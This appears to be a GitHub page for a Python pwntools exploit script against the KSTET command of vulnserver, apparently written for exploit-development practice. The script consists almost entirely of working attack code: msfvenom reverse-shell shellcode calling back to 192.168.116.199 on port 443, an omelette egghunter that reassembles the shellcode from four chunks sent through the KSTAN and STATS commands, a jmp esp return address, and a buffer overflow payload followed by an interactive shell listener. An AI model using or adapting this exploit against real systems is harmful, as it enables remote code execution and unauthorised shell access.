-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathkstet-omelette-egghunter-exploit.py
95 lines (84 loc) · 3.48 KB
/
kstet-omelette-egghunter-exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
from pwn import *
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.116.199 LPORT=443 -b '\x00' -f python > shell.rev
#x86/shikata_ga_nai succeeded with size 351 (iteration=0)
#x86/shikata_ga_nai chosen with final size 351
#Payload size: 351 bytes + 16 bytes
buf = b""
buf += b"\x90" * 16
buf += b"\xda\xd5\xb8\xae\x9f\xfc\x42\xd9\x74\x24\xf4\x5b\x29"
buf += b"\xc9\xb1\x52\x83\xeb\xfc\x31\x43\x13\x03\xed\x8c\x1e"
buf += b"\xb7\x0d\x5a\x5c\x38\xed\x9b\x01\xb0\x08\xaa\x01\xa6"
buf += b"\x59\x9d\xb1\xac\x0f\x12\x39\xe0\xbb\xa1\x4f\x2d\xcc"
buf += b"\x02\xe5\x0b\xe3\x93\x56\x6f\x62\x10\xa5\xbc\x44\x29"
buf += b"\x66\xb1\x85\x6e\x9b\x38\xd7\x27\xd7\xef\xc7\x4c\xad"
buf += b"\x33\x6c\x1e\x23\x34\x91\xd7\x42\x15\x04\x63\x1d\xb5"
buf += b"\xa7\xa0\x15\xfc\xbf\xa5\x10\xb6\x34\x1d\xee\x49\x9c"
buf += b"\x6f\x0f\xe5\xe1\x5f\xe2\xf7\x26\x67\x1d\x82\x5e\x9b"
buf += b"\xa0\x95\xa5\xe1\x7e\x13\x3d\x41\xf4\x83\x99\x73\xd9"
buf += b"\x52\x6a\x7f\x96\x11\x34\x9c\x29\xf5\x4f\x98\xa2\xf8"
buf += b"\x9f\x28\xf0\xde\x3b\x70\xa2\x7f\x1a\xdc\x05\x7f\x7c"
buf += b"\xbf\xfa\x25\xf7\x52\xee\x57\x5a\x3b\xc3\x55\x64\xbb"
buf += b"\x4b\xed\x17\x89\xd4\x45\xbf\xa1\x9d\x43\x38\xc5\xb7"
buf += b"\x34\xd6\x38\x38\x45\xff\xfe\x6c\x15\x97\xd7\x0c\xfe"
buf += b"\x67\xd7\xd8\x51\x37\x77\xb3\x11\xe7\x37\x63\xfa\xed"
buf += b"\xb7\x5c\x1a\x0e\x12\xf5\xb1\xf5\xf5\x3a\xed\x81\xc2"
buf += b"\xd3\xec\x69\xcc\x98\x78\x8f\xa4\xce\x2c\x18\x51\x76"
buf += b"\x75\xd2\xc0\x77\xa3\x9f\xc3\xfc\x40\x60\x8d\xf4\x2d"
buf += b"\x72\x7a\xf5\x7b\x28\x2d\x0a\x56\x44\xb1\x99\x3d\x94"
buf += b"\xbc\x81\xe9\xc3\xe9\x74\xe0\x81\x07\x2e\x5a\xb7\xd5"
buf += b"\xb6\xa5\x73\x02\x0b\x2b\x7a\xc7\x37\x0f\x6c\x11\xb7"
buf += b"\x0b\xd8\xcd\xee\xc5\xb6\xab\x58\xa4\x60\x62\x36\x6e"
buf += b"\xe4\xf3\x74\xb1\x72\xfc\x50\x47\x9a\x4d\x0d\x1e\xa5"
buf += b"\x62\xd9\x96\xde\x9e\x79\x58\x35\x1b\x89\x13\x17\x0a"
buf += b"\x02\xfa\xc2\x0e\x4f\xfd\x39\x4c\x76\x7e\xcb\x2d\x8d"
buf += b"\x9e\xbe\x28\xc9\x18\x53\x41\x42\xcd\x53\xf6\x63\xc4"
#Omelette EggHunter (53 bytes) "MNAB" 4x chunks (367 bytes = 91, 91, 91, 94)
egg = (
"\x89\xe5\x66\x81\xcb\xff\x0f\x43\x31\xc0\xb0\x02\x89\xda"
"\xcd\x2e\x3c\x05\x74\xee\xb8\x4d\x4e\x41\x42\x89\xdf\xaf"
"\x75\xe9\xaf\x75\xe6\x89\xfe\x89\xef\x66\xad\x31\xc9\x88"
"\xe1\x3c\x01\xf3\xa4\x89\xfd\x75\xd4\xff\xe4"
)
#Pre-generate Chunks - prepend tag, flag, size
chunk1 = "MNABMNAB"+"\x02\x5b"+buf[91*0:91*1]
chunk2 = "MNABMNAB"+"\x02\x5b"+buf[91*1:91*2]
chunk3 = "MNABMNAB"+"\x02\x5b"+buf[91*2:91*3]
chunk4 = "MNABMNAB"+"\x01\x5e"+buf[91*3:(91*4)+3]
#0x625011af : jmp esp | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Documents and Settings\XPXP\Desktop\vulnserver-master\vulnserver-master\essfunc.dll)
jmpesp = p32(0x625011af)
fixesp = (
"\xcc"
"\x83\xc0\x0a" # add eax,byte +0xa
"\x54" # PUSH ESP
"\x5A" # POP EDX
"\xB6\xFC" # MOV DH,0FC
"\x52" # PUSH EDX
"\x5c" # POP ESP
"\xff\xe0" # JMP EAX
)
poc = b"KSTET /.:/"
poc += "\x90"
poc += "\xfc" # CLD instruction
poc += egg
poc += b"A" * ((66 + 10) - len(poc))
poc += jmpesp
poc += fixesp
poc += b"C" * ((5000 + 10) - len(poc))
l = listen(443)
#Setup
r = remote('192.168.116.178', 9999)
print r.recvline()
r.send("KSTAN " + "BEEF1" + chunk1 + "BEEF2" + chunk2)
r.close()
r = remote('192.168.116.178', 9999)
print r.recvline()
r.send("STATS " + "BEEF3" + chunk3 + "BEEF4" + chunk4)
r.close()
#Exploit
r = remote('192.168.116.178', 9999)
print r.recvline()
r.send(poc)
r.close()
l.recvline()
l.interactive()
l.close()